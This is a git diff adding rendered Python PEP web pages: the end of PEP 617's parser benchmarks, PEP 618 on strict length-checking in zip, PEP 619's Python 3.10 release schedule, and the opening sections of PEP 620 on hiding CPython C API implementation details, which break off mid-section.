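+
+BLOCK = (
+    "1 + 2 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + "
+    "((((((11 * 12 * 13 * 14 * 15 + 16 * 17 + 18 * 19 * 20))))))\n"
+    "2*3 + 4*5*6\n"
+    "12 + (2 * 3 * 4 * 5 + 6 + 7 * 8)\n"
+)
+SOURCE = BLOCK * (100_000 // 3)  # roughly 100,000 lines of source
+
+def bench(runs=3):
+    """Median wall-clock time to compile SOURCE, plus max RSS so far."""
+    samples = []
+    for _ in range(runs):
+        start = time.perf_counter()
+        compile(SOURCE, "<bench>", "exec")  # parse and compile to bytecode
+        samples.append(time.perf_counter() - start)
+    max_rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
+    return statistics.median(samples), max_rss
+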

For this particular test file, the new parser is faster and uses less +memory than the current parser (compare the last two bullets).

+

We also did timings with a more realistic payload, the entire Python +3.8 stdlib. This payload consists of 1,641 files, 749,570 lines, +27,622,497 bytes. (Though 11 files can’t be compiled by any Python 3 +parser due to encoding issues, sometimes intentional.)

+
    +
  • Compiling and throwing away the internal AST took 2.141 seconds. +That’s 350,040 lines/sec, or 12,899,367 bytes/sec. The max RSS was +74 MiB (the largest file in the stdlib is much smaller than our +canonical test file).
  • +
  • Compiling to bytecode took 3.290 seconds. That’s 227,861 lines/sec, +or 8,396,942 bytes/sec. Max RSS 77 MiB.
  • +
  • Compiling to bytecode using the current parser took 3.367 seconds. +That’s 222,620 lines/sec, or 8,203,780 bytes/sec. Max RSS 70 MiB.
  • +
+

Comparing the last two bullets we find that the new parser is slightly +faster but uses slightly (about 10%) more memory. We believe this is +acceptable. (Also, there are probably some more tweaks we can make to +reduce memory usage.)

+
+
+
+

Rejected Alternatives

+

We did not seriously consider alternative ways to implement the new +parser, but here’s a brief discussion of LALR(1).

+

Thirty years ago the first author decided to go his own way with +Python’s parser rather than using LALR(1), which was the industry +standard at the time (e.g. Bison and Yacc). The reasons were +primarily emotional (gut feelings, intuition), based on past experience +using Yacc in other projects, where grammar development took more +effort than anticipated (in part due to shift-reduce conflicts). A +specific criticism of Bison and Yacc that still holds is that their +meta-grammar (the notation used to feed the grammar into the parser +generator) does not support EBNF conveniences like +[optional_clause] or (repeated_clause)*. Using a custom +parser generator, a syntax tree matching the structure of the grammar +could be generated automatically, and with EBNF that tree could match +the “human-friendly” structure of the grammar.

+

Other variants of LR were not considered, nor was LL (e.g. ANTLR). +PEG was selected because it was easy to understand given a basic +understanding of recursive-descent parsing.

+
+
+

References

+ +

[4] Guido’s series on PEG parsing + https://medium.com/@gvanrossum_83706/peg-parsing-series-de5d41b2ed60

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0617.rst

+

Last modified: 2023-12-18 21:39:13 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0618/index.html b/pep-0618/index.html new file mode 100644 index 00000000000..f1ba87c064c --- /dev/null +++ b/pep-0618/index.html @@ -0,0 +1,498 @@ + PEP 618 – Add Optional Length-Checking To zip | peps.python.org
+
+


+ + +
+
+
+

PEP 618 – Add Optional Length-Checking To zip

+
+
Author:
+
Brandt Bucher <brandt at python.org>
+
Sponsor:
+
Antoine Pitrou <antoine at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2020
+
Python-Version:
+
3.10
+
Post-History:
+
01-May-2020, 10-May-2020, 16-Jun-2020
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This PEP proposes adding an optional strict boolean keyword +parameter to the built-in zip. When enabled, a ValueError is +raised if one of the arguments is exhausted before the others.

+
+
+

Motivation

+

It is clear from the author’s personal experience and a survey of the +standard library that much (if not most) zip usage +involves iterables that must be of equal length. Sometimes this +invariant is proven true from the context of the surrounding code, but +often the data being zipped is passed from the caller, sourced +separately, or generated in some fashion. In any of these cases, the +default behavior of zip means that faulty refactoring or logic +errors could easily result in silently losing data. These bugs are +not only difficult to diagnose, but difficult to even detect at all.

+

It is easy to come up with simple cases where this could be a problem. +For example, the following code may work fine when items is a +sequence, but silently start producing shortened, mismatched results +if items is refactored by the caller to be a consumable iterator:

+
def apply_calculations(items):
+    transformed = transform(items)
+    for i, t in zip(items, transformed):
+        yield calculate(i, t)
+
+
+
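
With the strict=True flag proposed by this PEP (see the Specification below), the same code fails loudly at the point of mismatch instead of silently dropping data:

+
def apply_calculations(items):
+    transformed = transform(items)
+    # strict=True raises ValueError if the iterables end at different lengths.
+    for i, t in zip(items, transformed, strict=True):
+        yield calculate(i, t)
+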

There are several other ways in which zip is commonly used. +Idiomatic tricks are especially susceptible, because they are often +employed by users who lack a complete understanding of how the code +works. One example is unpacking into zip to lazily “unzip” or +“transpose” nested iterables:

+
>>> x = [[1, 2, 3], ["one" "two" "three"]]
+>>> xt = list(zip(*x))
+
+
+

Another is “chunking” data into equal-sized groups:

+
>>> n = 3
+>>> x = range(n ** 2),
+>>> xn = list(zip(*[iter(x)] * n))
+
+
+

In the first case, non-rectangular data is usually a logic error. In +the second case, data with a length that is not a multiple of n is +often an error as well. However, both of these idioms will silently +omit the tail-end items of malformed input.

+
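
Both idioms can be hardened with the flag proposed below. For example, strict chunking raises a ValueError when the data length is not a multiple of n, rather than silently dropping the tail:

+
>>> n = 3
+>>> x = range(n ** 2)
+>>> xn = list(zip(*[iter(x)] * n, strict=True))
+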

Perhaps most convincingly, the use of zip in the standard-library +ast module created a bug in literal_eval which silently +dropped parts of malformed nodes:

+
>>> from ast import Constant, Dict, literal_eval
+>>> nasty_dict = Dict(keys=[Constant(None)], values=[])
+>>> literal_eval(nasty_dict)  # Like eval("{None: }")
+{}
+
+
+

In fact, the author has counted dozens of other call sites in Python’s standard library and tooling where it +would be appropriate to enable this new feature immediately.

+
+
+

Rationale

+

Some critics assert that constant boolean switches are a “code-smell”, +or go against Python’s design philosophy. However, Python currently +contains several examples of boolean keyword parameters on built-in +functions which are typically called with compile-time constants:

+
    +
  • compile(..., dont_inherit=True)
  • +
  • open(..., closefd=False)
  • +
  • print(..., flush=True)
  • +
  • sorted(..., reverse=True)
  • +
+

Many more exist in the standard library.

+

The idea and name for this new parameter were originally proposed +by Ram Rachum. The thread received over 100 replies, with the +alternative “equal” receiving a similar amount of support.

+

The author does not have a strong preference between the two choices, +though “equal equals” is a bit awkward in prose. It may also +(wrongly) imply some notion of “equality” between the zipped items:

+
>>> z = zip([2.0, 4.0, 6.0], [2, 4, 8], equal=True)
+
+
+
+
+

Specification

+

When the built-in zip is called with the keyword-only argument +strict=True, the resulting iterator will raise a ValueError if +the arguments are exhausted at differing lengths. This error will +occur at the point when iteration would normally stop today.

+
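
For example, as implemented in Python 3.10:

+
>>> list(zip(range(3), ["fee", "fi", "fo"], strict=True))
+[(0, 'fee'), (1, 'fi'), (2, 'fo')]
+>>> list(zip(range(3), ["fee", "fi", "fo", "fum"], strict=True))
+Traceback (most recent call last):
+  ...
+ValueError: zip() argument 2 is longer than argument 1
+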
+
+

Backward Compatibility

+

This change is fully backward-compatible. zip currently takes no +keyword arguments, and the “non-strict” default behavior when +strict is omitted remains unchanged.

+
+
+

Reference Implementation

+

The author has drafted a C implementation.

+

An approximate Python translation is:

+
def zip(*iterables, strict=False):
+    if not iterables:
+        return
+    iterators = tuple(iter(iterable) for iterable in iterables)
+    try:
+        while True:
+            items = []
+            for iterator in iterators:
+                items.append(next(iterator))
+            yield tuple(items)
+    except StopIteration:
+        if not strict:
+            return
+    if items:
+        i = len(items)
+        plural = " " if i == 1 else "s 1-"
+        msg = f"zip() argument {i+1} is shorter than argument{plural}{i}"
+        raise ValueError(msg)
+    sentinel = object()
+    for i, iterator in enumerate(iterators[1:], 1):
+        if next(iterator, sentinel) is not sentinel:
+            plural = " " if i == 1 else "s 1-"
+            msg = f"zip() argument {i+1} is longer than argument{plural}{i}"
+            raise ValueError(msg)
+
+
+
+
+

Rejected Ideas

+
+

Add itertools.zip_strict

+

This is the alternative with the most support on the Python-Ideas +mailing list, so it deserves to be discussed in some detail here. It +does not have any disqualifying flaws, and could work well enough as a +substitute if this PEP is rejected.

+

With that in mind, this section aims to outline why adding an optional +parameter to zip is a smaller change that ultimately does a better +job of solving the problems motivating this PEP.

+
+

Precedent

+

It seems that a great deal of the motivation driving this alternative +is that zip_longest already exists in itertools. However, +zip_longest is in many ways a much more complicated, specialized +utility: it takes on the responsibility of filling in missing values, +a job neither of the other variants needs to concern themselves with.

+

If both zip and zip_longest lived alongside each other in +itertools or as builtins, then adding zip_strict in the same +location would indeed be a much stronger argument. However, the new +“strict” variant is conceptually much closer to zip in interface +and behavior than zip_longest, while still not meeting the high +bar of being its own builtin. Given this situation, it seems most +natural for zip to grow this new option in-place.

+
+
+

Usability

+

If zip is capable of preventing this class of bug, it becomes much +simpler for users to enable the check at call sites with this +property. Compare this with importing a drop-in replacement for a +built-in utility, which feels somewhat heavy just to check a tricky +condition that should “always” be true.

+

Some have also argued that a new function buried in the standard +library is somehow more “discoverable” than a keyword parameter on the +built-in itself. The author does not agree with this assessment.

+
+
+

Maintenance Cost

+

While implementation should only be a secondary concern when making +usability improvements, it is important to recognize that adding a new +utility is significantly more complicated than modifying an existing +one. The CPython implementation accompanying this PEP is simple and +has no measurable performance impact on default zip behavior, +while adding an entirely new utility to itertools would require +either:

+
    +
  • Duplicating much of the existing zip logic, as zip_longest +already does.
  • +
  • Significantly refactoring either zip, zip_longest, or both +to share a common or inherited implementation (which may impact +performance).
  • +
+
+
+
+

Add Several “Modes” To Switch Between

+

This option only makes more sense than a binary flag if we anticipate +having three or more modes. The “obvious” three choices for these +enumerated or constant modes would be “shortest” (the current zip +behavior), “strict” (the proposed behavior), and “longest” +(the itertools.zip_longest behavior).

+

However, it doesn’t seem like adding behaviors other than the current +default and the proposed “strict” mode is worth the additional +complexity. The clearest candidate, “longest”, would require a new +fillvalue parameter (which is meaningless for both other modes). +This mode is also already handled perfectly by +itertools.zip_longest, and adding it would create two ways of +doing the same thing. It’s not clear which would be the “obvious” +choice: the mode parameter on the built-in zip, or the +long-lived namesake utility in itertools.

+
+
+

Add A Method Or Alternate Constructor To The zip Type

+

Consider the following two options, which have both been proposed:

+
>>> zm = zip(*iters).strict()
+>>> zd = zip.strict(*iters)
+
+
+

It’s not obvious which one will succeed, or how the other will fail. +If zip.strict is implemented as a method, zm will succeed, but +zd will fail in one of several confusing ways:

+
    +
  • Yield results that aren’t wrapped in a tuple (if iters contains +just one item, a zip iterator).
  • +
  • Raise a TypeError for an incorrect argument type (if iters +contains just one item, not a zip iterator).
  • +
  • Raise a TypeError for an incorrect number of arguments +(otherwise).
  • +
+

If zip.strict is implemented as a classmethod or +staticmethod, zd will succeed, and zm will silently yield +nothing (which is the problem we are trying to avoid in the first +place).

+

This proposal is further complicated by the fact that CPython’s actual +zip type is currently an undocumented implementation detail. This +means that choosing one of the above behaviors will effectively “lock +in” the current implementation (or at least require it to be emulated) +going forward.

+
+
+

Change The Default Behavior Of zip

+

There is nothing “wrong” with the default behavior of zip, since +there are many cases where it is indeed the correct way to handle +unequally-sized inputs. It’s extremely useful, for example, when +dealing with infinite iterators.

+

itertools.zip_longest already exists to service those cases where +the “extra” tail-end data is still needed.

+
+
+

Accept A Callback To Handle Remaining Items

+

While able to do basically anything a user could need, this solution +makes handling the more common cases (like rejecting mismatched +lengths) unnecessarily complicated and non-obvious.

+
+
+

Raise An AssertionError

+

There are no built-in functions or types that raise an +AssertionError as part of their API. Further, the official +documentation +simply reads (in its entirety):

+
+
Raised when an assert statement fails.
+

Since this feature has nothing to do with Python’s assert +statement, raising an AssertionError here would be inappropriate. +Users desiring a check that is disabled in optimized mode (like an +assert statement) can use strict=__debug__ instead.

+
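
For example (keys and values are hypothetical sequences):

+
# The length check runs during development but is skipped under
+# "python -O", where __debug__ is False, mirroring assert semantics.
+pairs = list(zip(keys, values, strict=__debug__))
+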
+
+

Add A Similar Feature to map

+

This PEP does not propose any changes to map, since the use of map with multiple iterable arguments is quite rare. However, this PEP’s ruling shall serve as precedent for such a future discussion (should it occur).

+

If rejected, the feature is realistically not worth pursuing. If accepted, such a change to map should not require its own PEP (though, like all enhancements, its usefulness should be carefully considered). For consistency, it should follow the same API and semantics debated here for zip.

+
+
+

Do Nothing

+

This option is perhaps the least attractive.

+

Silently truncated data is a particularly nasty class of bug, and +hand-writing a robust solution that gets this right isn’t trivial. +The real-world motivating examples from Python’s own standard library +are evidence that it’s very easy to fall into the sort of trap that +this feature aims to avoid.

+
+
+
+

References

+
+

Examples

+
+

Note

+

This listing is not exhaustive.

+
+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0618.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0619/index.html b/pep-0619/index.html new file mode 100644 index 00000000000..a60c8ccaa04 --- /dev/null +++ b/pep-0619/index.html @@ -0,0 +1,245 @@ + PEP 619 – Python 3.10 Release Schedule | peps.python.org
+
+


+ + +
+
+
+

PEP 619 – Python 3.10 Release Schedule

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
25-May-2020
+
Python-Version:
+
3.10
+
+
+
+
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.10. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.10 Release Manager: Pablo Galindo Salgado
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.10.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.10 development begins: Monday, 2020-05-18
  • +
  • 3.10.0 alpha 1: Monday, 2020-10-05
  • +
  • 3.10.0 alpha 2: Tuesday, 2020-11-03
  • +
  • 3.10.0 alpha 3: Monday, 2020-12-07
  • +
  • 3.10.0 alpha 4: Monday, 2021-01-04
  • +
  • 3.10.0 alpha 5: Wednesday, 2021-02-03
  • +
  • 3.10.0 alpha 6: Monday, 2021-03-01
  • +
  • 3.10.0 alpha 7: Tuesday, 2021-04-06
  • +
  • 3.10.0 beta 1: Monday, 2021-05-03 +(No new features beyond this point.)
  • +
  • 3.10.0 beta 2: Monday, 2021-05-31
  • +
  • 3.10.0 beta 3: Thursday, 2021-06-17
  • +
  • 3.10.0 beta 4: Saturday, 2021-07-10
  • +
  • 3.10.0 candidate 1: Tuesday, 2021-08-03
  • +
  • 3.10.0 candidate 2: Tuesday, 2021-09-07
  • +
  • 3.10.0 final: Monday, 2021-10-04
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.10.1: Monday, 2021-12-06
  • +
  • 3.10.2: Friday, 2022-01-14
  • +
  • 3.10.3: Wednesday, 2022-03-16
  • +
  • 3.10.4: Thursday, 2022-03-24
  • +
  • 3.10.5: Monday, 2022-06-06
  • +
  • 3.10.6: Tuesday, 2022-08-02
  • +
  • 3.10.7: Tuesday, 2022-09-06
  • +
  • 3.10.8: Tuesday, 2022-10-11
  • +
  • 3.10.9: Tuesday, 2022-12-06
  • +
  • 3.10.10: Wednesday, 2023-02-08
  • +
  • 3.10.11: Wednesday, 2023-04-05 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 2026.

+
    +
  • 3.10.12: Tuesday, 2023-06-06
  • +
  • 3.10.13: Thursday, 2023-08-24
  • +
  • 3.10.14: Tuesday, 2024-03-19
  • +
  • 3.10.15: Saturday, 2024-09-07
  • +
  • 3.10.16: Tuesday, 2024-12-03
  • +
+
+
+

3.10 Lifespan

+

3.10 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.11.0 final, +the 11th and final 3.10 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.10 final, so until approximately +October 2026.

+
+
+
+

Features for 3.10

+

Some of the notable features of Python 3.10 include:

+
    +
  • PEP 604, Allow writing union types as X | Y
  • +
  • PEP 612, Parameter Specification Variables
  • +
  • PEP 613, Explicit Type Aliases
  • +
  • PEP 618, Add Optional Length-Checking To zip
  • +
  • PEP 626, Precise line numbers for debugging and other tools
  • +
  • PEP 634, PEP 635, PEP 636, Structural Pattern Matching
  • +
  • PEP 644, Require OpenSSL 1.1.1 or newer
  • +
  • PEP 624, Remove Py_UNICODE encoder APIs
  • +
  • PEP 597, Add optional EncodingWarning
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0619.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0620/index.html b/pep-0620/index.html new file mode 100644 index 00000000000..f9f96dd892b --- /dev/null +++ b/pep-0620/index.html @@ -0,0 +1,703 @@ + PEP 620 – Hide implementation details from the C API | peps.python.org
+
+


+ + +
+
+
+

PEP 620 – Hide implementation details from the C API

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
19-Jun-2020
+
Python-Version:
+
3.12
+
+
+
+
+
+

Abstract

+

Introduce C API incompatible changes to hide implementation details.

+

Once most implementation details are hidden, the evolution of CPython internals will be less limited by C API backward compatibility issues, and it will be much easier to add new features.

+

It becomes possible to experiment with more advanced optimizations in +CPython than just micro-optimizations, like tagged pointers.

+

Define a process to reduce the number of broken C extensions.

+

The implementation of this PEP is expected to be done carefully over +multiple Python versions. It already started in Python 3.7 and most +changes are already completed. The Process to reduce the number of +broken C extensions dictates the rhythm.

+
+
+

PEP withdrawn

+

This PEP was withdrawn by its author since the scope is too broad and the work is +distributed over multiple Python versions, which makes it difficult to make +a decision on the overall PEP. It was split into new PEPs with +narrower and better defined scopes, like PEP 670.

+
+
+

Motivation

+
+

The C API blocks CPython evolutions

+

Adding or removing members of C structures causes multiple backward compatibility issues.

+

Adding a new member breaks the stable ABI (PEP 384), especially for +types declared statically (e.g. static PyTypeObject MyType = +{...};). In Python 3.4, the PEP 442 “Safe object finalization” added +the tp_finalize member at the end of the PyTypeObject structure. +For ABI backward compatibility, a new Py_TPFLAGS_HAVE_FINALIZE type +flag was required to announce if the type structure contains the +tp_finalize member. The flag was removed in Python 3.8 (bpo-32388).

+

The PyTypeObject.tp_print member, deprecated since Python 3.0 +released in 2009, has been removed in the Python 3.8 development cycle. +But the change broke too many C extensions and had to be reverted before +3.8 final release. Finally, the member was removed again in Python 3.9.

+

C extensions rely on the ability to access structure members, indirectly through the C API, or even directly. Modifying structures like PyListObject cannot even be considered.

+

The PyTypeObject structure is the one which evolved the most, simply +because there was no other way to evolve CPython than modifying it.

+

A C extension can technically dereference a PyObject* pointer and +access PyObject members. This prevents experiments like tagged +pointers (storing small values as PyObject* which does not point to +a valid PyObject structure).

+

Replacing the Python garbage collector with a tracing garbage collector would also require removing the PyObject.ob_refcnt reference counter, whereas the Py_INCREF() and Py_DECREF() macros currently access PyObject.ob_refcnt directly.

+
+
+

Same CPython design since 1990: structures and reference counting

+

When the CPython project was created, it was written with one principle: +keep the implementation simple enough so it can be maintained by a +single developer. CPython complexity grew a lot and many +micro-optimizations have been implemented, but CPython core design has +not changed.

+

Members of PyObject and PyTupleObject structures have not +changed since the “Initial revision” commit (1990):

+
#define OB_HEAD \
+    unsigned int ob_refcnt; \
+    struct _typeobject *ob_type;
+
+typedef struct _object {
+    OB_HEAD
+} object;
+
+typedef struct {
+    OB_VARHEAD
+    object *ob_item[1];
+} tupleobject;
+
+
+

Only names changed: object was renamed to PyObject and +tupleobject was renamed to PyTupleObject.

+

CPython still tracks Python objects lifetime using reference counting +internally and for third party C extensions (through the Python C API).

+

All Python objects must be allocated on the heap and cannot be moved.

+
+
+

Why is PyPy more efficient than CPython?

+

The PyPy project is a Python implementation which is 4.2x faster than +CPython on average. PyPy developers chose to not fork CPython, but start +from scratch to have more freedom in terms of optimization choices.

+

PyPy does not use reference counting, but a tracing garbage collector +which moves objects. Objects can be allocated on the stack (or even not +at all), rather than always having to be allocated on the heap.

+

Object layouts are designed with performance in mind. For example, a list strategy stores integers directly as integers, rather than objects.

+

Moreover, PyPy also has a JIT compiler which emits fast code thanks to +the efficient PyPy design.

+
+
+

PyPy bottleneck: the Python C API

+

While PyPy is far more efficient than CPython at running pure Python code, it is no more efficient, and often slower, than CPython at running C extensions.

+

Since the C API requires PyObject* and allows direct access to structure members, PyPy has to associate a CPython object with each PyPy object and keep the two consistent. Converting a PyPy object to a CPython object is inefficient. Moreover, reference counting also has to be implemented on top of PyPy’s tracing garbage collector.

+

These conversions are required because the Python C API is too close to the CPython implementation: there is no high-level abstraction. For example, structure members are part of the public C API and nothing prevents a C extension from directly getting or setting PyTupleObject.ob_item[0] (the first item of a tuple).

+

See Inside cpyext: Why emulating CPython C API is so Hard +(Sept 2018) by Antonio Cuni for more details.

+
+
+
+

Rationale

+
+

Hide implementation details

+

Hiding implementation details from the C API has multiple advantages:

+
    +
• It becomes possible to experiment with more advanced optimizations in CPython than just micro-optimizations, for example tagged pointers, or replacing the garbage collector with a tracing garbage collector which can move objects.
  • +
  • Adding new features in CPython becomes easier.
  • +
  • PyPy should be able to avoid conversions to CPython objects in more +cases: keep efficient PyPy objects.
  • +
  • It becomes easier to implement the C API for a new Python +implementation.
  • +
  • More C extensions will be compatible with Python implementations other +than CPython.
  • +
+
+
+

Relationship with the limited C API

+

PEP 384 “Defining a Stable ABI” was implemented in Python 3.4. It introduces the “limited C API”: a subset of the C API. When the limited C API is used, it becomes possible to build a C extension only once and use it with multiple Python versions: that’s the stable ABI.

+

The main limitation of PEP 384 is that C extensions have to opt in to the limited C API. Only a very few projects have made this choice, usually to ease the distribution of binaries, especially on Windows.

+

This PEP moves the C API towards the limited C API.

+

Ideally, the C API will become the limited C API and all C extensions will use the stable ABI, but this is out of this PEP’s scope.

+
+
+
+

Specification

+
+

Summary

+
    +
  • (Completed) Reorganize the C API header files: create Include/cpython/ and +Include/internal/ subdirectories.
  • +
  • (Completed) Move private functions exposing implementation details to the internal +C API.
  • +
  • (Completed) Convert macros to static inline functions.
  • +
  • (Completed) Add new functions Py_SET_TYPE(), Py_SET_REFCNT() and +Py_SET_SIZE(). The Py_TYPE(), Py_REFCNT() and +Py_SIZE() macros become functions which cannot be used as l-value.
  • +
  • (Completed) New C API functions must not return borrowed +references.
  • +
  • (In Progress) Provide pythoncapi_compat.h header file.
  • +
  • (In Progress) Make structures opaque, add getter and setter +functions.
  • +
  • (Not Started) Deprecate PySequence_Fast_ITEMS().
  • +
  • (Not Started) Convert PyTuple_GET_ITEM() and +PyList_GET_ITEM() macros to static inline functions.
  • +
+
+
+

Reorganize the C API header files

+

The first consumer of the C API was Python itself. There is no clear separation between APIs which must not be used outside Python and APIs which are public on purpose.

+

Header files must be reorganized into 3 APIs:

+
    +
  • Include/ directory is the limited C API: no implementation +details, structures are opaque. C extensions using it get a stable +ABI.
  • +
• Include/cpython/ directory is the CPython C API: a less “portable” API which depends more on the Python version, exposes some implementation details, and in which a few incompatible changes can happen.
  • +
  • Include/internal/ directory is the internal C API: implementation +details, incompatible changes are likely at each Python release.
  • +
+

The creation of the Include/cpython/ directory is fully backward +compatible. Include/cpython/ header files cannot be included +directly and are included automatically by Include/ header files +when the Py_LIMITED_API macro is not defined.

+

The internal C API is installed and can be used for specific use cases like debuggers and profilers which must access structure members without executing code. C extensions using the internal C API are tightly coupled to a Python version and must be recompiled at each Python version.

+

STATUS: Completed (in Python 3.8)

+

The reorganization of header files started in Python 3.7 and was +completed in Python 3.8:

+
    +
  • bpo-35134: Add a new +Include/cpython/ subdirectory for the “CPython API” with +implementation details.
  • +
  • bpo-35081: Move internal +headers to Include/internal/
  • +
+
+
+

Move private functions to the internal C API

+

Private functions which expose implementation details must be moved to +the internal C API.

+

If a C extension relies on a CPython private function which exposes +CPython implementation details, other Python implementations have to +re-implement this private function to support this C extension.

+

STATUS: Completed (in Python 3.9)

+

Private functions moved to the internal C API in Python 3.8:

+
    +
  • _PyObject_GC_TRACK(), _PyObject_GC_UNTRACK()
  • +
+

Macros and functions excluded from the limited C API in Python 3.9:

+
    +
  • _PyObject_SIZE(), _PyObject_VAR_SIZE()
  • +
  • PyThreadState_DeleteCurrent()
  • +
  • PyFPE_START_PROTECT(), PyFPE_END_PROTECT()
  • +
  • _Py_NewReference(), _Py_ForgetReference()
  • +
  • _PyTraceMalloc_NewReference()
  • +
  • _Py_GetRefTotal()
  • +
+

Private functions moved to the internal C API in Python 3.9:

+
    +
  • GC functions like _Py_AS_GC(), _PyObject_GC_IS_TRACKED() +and _PyGCHead_NEXT()
  • +
  • _Py_AddToAllObjects() (not exported)
  • +
  • _PyDebug_PrintTotalRefs(), _Py_PrintReferences(), +_Py_PrintReferenceAddresses() (not exported)
  • +
+

Public “clear free list” functions moved to the internal C API and +renamed to private functions in Python 3.9:

+
    +
  • PyAsyncGen_ClearFreeLists()
  • +
  • PyContext_ClearFreeList()
  • +
  • PyDict_ClearFreeList()
  • +
  • PyFloat_ClearFreeList()
  • +
  • PyFrame_ClearFreeList()
  • +
  • PyList_ClearFreeList()
  • +
  • PyTuple_ClearFreeList()
  • +
  • Functions simply removed:
      +
    • PyMethod_ClearFreeList() and PyCFunction_ClearFreeList(): +bound method free list removed in Python 3.9.
    • +
    • PySet_ClearFreeList(): set free list removed in Python 3.4.
    • +
    • PyUnicode_ClearFreeList(): Unicode free list removed +in Python 3.3.
    • +
    +
  • +
+
+
+

Convert macros to static inline functions

+

Converting macros to static inline functions has multiple advantages:

+
    +
  • Functions have well defined parameter types and return type.
  • +
  • Functions can use variables with a well defined scope (the function).
  • +
• Debuggers can put breakpoints on functions, and profilers can display the function name in call stacks. In most cases, this works even when a static inline function is inlined.
  • +
• Functions don’t have macro pitfalls.
  • +
+

Converting macros to static inline functions should only impact very few +C extensions that use macros in unusual ways.

+

For backward compatibility, functions must continue to accept any type, +not only PyObject*, to avoid compiler warnings, since most macros +cast their parameters to PyObject*.

+

Python 3.6 requires C compilers to support static inline functions: the +PEP 7 requires a subset of C99.

+

STATUS: Completed (in Python 3.9)

+

Macros converted to static inline functions in Python 3.8:

+
    +
  • Py_INCREF(), Py_DECREF()
  • +
  • Py_XINCREF(), Py_XDECREF()
  • +
  • PyObject_INIT(), PyObject_INIT_VAR()
  • +
  • _PyObject_GC_TRACK(), _PyObject_GC_UNTRACK(), _Py_Dealloc()
  • +
+

Macros converted to regular functions in Python 3.9:

+
    +
  • Py_EnterRecursiveCall(), Py_LeaveRecursiveCall() +(added to the limited C API)
  • +
  • PyObject_INIT(), PyObject_INIT_VAR()
  • +
  • PyObject_GET_WEAKREFS_LISTPTR()
  • +
  • PyObject_CheckBuffer()
  • +
  • PyIndex_Check()
  • +
  • PyObject_IS_GC()
  • +
  • PyObject_NEW() (alias to PyObject_New()), +PyObject_NEW_VAR() (alias to PyObject_NewVar())
  • +
  • PyType_HasFeature() (always call PyType_GetFlags())
  • +
  • Py_TRASHCAN_BEGIN_CONDITION() and Py_TRASHCAN_END() macros +now call functions which hide implementation details, rather than +accessing directly members of the PyThreadState structure.
  • +
+
+
+

Make structures opaque

+

The following structures of the C API become opaque:

+
    +
  • PyInterpreterState
  • +
  • PyThreadState
  • +
  • PyGC_Head
  • +
  • PyTypeObject
  • +
  • PyObject and PyVarObject
  • +
  • All types which inherit from PyObject or PyVarObject
  • +
+

C extensions must use getter or setter functions to get or set structure +members. For example, tuple->ob_item[0] must be replaced with +PyTuple_GET_ITEM(tuple, 0).

+

To be able to move away from reference counting, PyObject must become opaque. Currently, the reference counter PyObject.ob_refcnt is exposed in the C API. All structures must become opaque, since they “inherit” from PyObject. For example, PyFloatObject inherits from PyObject:

+
typedef struct {
+    PyObject ob_base;
+    double ob_fval;
+} PyFloatObject;
+
+
+

Making PyObject fully opaque requires converting Py_INCREF() and +Py_DECREF() macros to function calls. This change has an impact on +performance. It is likely to be one of the very last changes when making +structures opaque.

+

Making the PyTypeObject structure opaque breaks C extensions declaring types statically (e.g. static PyTypeObject MyType = {...};). C extensions must use PyType_FromSpec() to allocate types on the heap instead. Using heap types has other advantages like being compatible with subinterpreters. Combined with PEP 489 “Multi-phase extension module initialization”, it makes a C extension behave more like a Python module, for example by allowing the creation of more than one module instance.

+

Making PyThreadState structure opaque requires adding getter and +setter functions for members used by C extensions.

+

STATUS: In Progress (started in Python 3.8)

+

The PyInterpreterState structure was made opaque in Python 3.8 +(bpo-35886) and the +PyGC_Head structure (bpo-40241) was made opaque in Python 3.9.

+

Issues tracking the work to prepare the C API to make following +structures opaque:

+
    +
  • PyObject: bpo-39573
  • +
  • PyTypeObject: bpo-40170
  • +
  • PyFrameObject: bpo-40421
      +
    • Python 3.9 adds PyFrame_GetCode() and PyFrame_GetBack() +getter functions, and moves PyFrame_GetLineNumber to the limited +C API.
    • +
    +
  • +
  • PyThreadState: bpo-39947
      +
    • Python 3.9 adds 3 getter functions: PyThreadState_GetFrame(), +PyThreadState_GetID(), PyThreadState_GetInterpreter().
    • +
    +
  • +
+
+
+

Disallow using Py_TYPE() as l-value

+

The Py_TYPE() function gets an object’s type, its PyObject.ob_type member. It is implemented as a macro which can be used as an l-value to set the type: Py_TYPE(obj) = new_type. Such code relies on the assumption that PyObject.ob_type can be modified directly, which prevents making the PyObject structure opaque.

+

New setter functions Py_SET_TYPE(), Py_SET_REFCNT() and +Py_SET_SIZE() are added and must be used instead.

+

The Py_TYPE(), Py_REFCNT() and Py_SIZE() macros must be converted to static inline functions which cannot be used as an l-value.

+

For example, the Py_TYPE() macro:

+
